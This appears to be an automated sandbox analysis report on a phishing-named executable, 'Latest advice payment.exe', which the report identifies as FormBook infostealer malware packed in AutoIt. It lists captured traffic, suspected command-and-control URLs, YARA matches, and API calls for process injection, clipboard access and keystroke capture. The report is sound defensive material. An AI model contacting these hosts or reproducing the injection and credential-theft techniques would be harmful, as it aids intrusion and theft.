f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HS5drpFChwJ328d1XNN0it3lxzzDZlwcJI72QUKoQQUEqX%2F4oZekHZd0JvFPN5i3uar0%2FmYDU%2FOZM3bcG0xwADWXieDcwkcBbnbtQoOMUNh0M9HYO%2BeG3CXA6jlzYUchyOYQ971cp74%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe9c2af9efa7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1788&rtt_var=894&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1806&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:19 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPf1IiQcliVuwc3mFxRJvJp8WgPKsXPOXeG9fGTrnLcPgY0y%2BXfBjUh%2F4yy2Pc0UkgVDGudBThhs1a%2FJSbFgEQjriNgwoeN4ufZAdvIQfyqeC59nW7Qly%2FbS7OK0g5ihVlU9hUBuINk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6feac9e3bf78d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1602&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000008.00000002.3991882171.000000000411C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3993392825.00000000060D0000.00000004.00000800.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991649749.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: CWtKbasqHVKAO.exe, 0000000C.00000002.3993071436.00000000057B5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnwithus.site
                Source: CWtKbasqHVKAO.exe, 0000000C.00000002.3993071436.00000000057B5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnwithus.site/alu5/
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000008.00000002.3991882171.0000000003C66000.00000004.10000000.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991649749.00000000038A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000008.00000003.2621680573.0000000007AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_i
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000008.00000002.3990124569.00000000005C0000.00000004.00000020.00040000.00000000.sdmpString found in binary or memory: https://login.livnn
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_005D4164
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_005D4164
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005D3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_005D3F66
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_005C001C
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005ECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_005ECABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: This is a third-party compiled AutoIt script.0_2_00563B3A
                Source: Latest advice payment.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Latest advice payment.exe, 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_58051aa0-9
                Source: Latest advice payment.exe, 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5839963a-c
                Source: Latest advice payment.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2703f49c-2
                Source: Latest advice payment.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_aac89b63-7
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Latest advice payment.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CA93 NtClose,2_2_0042CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,2_2_03472C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_005CA1EF
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_005B8310
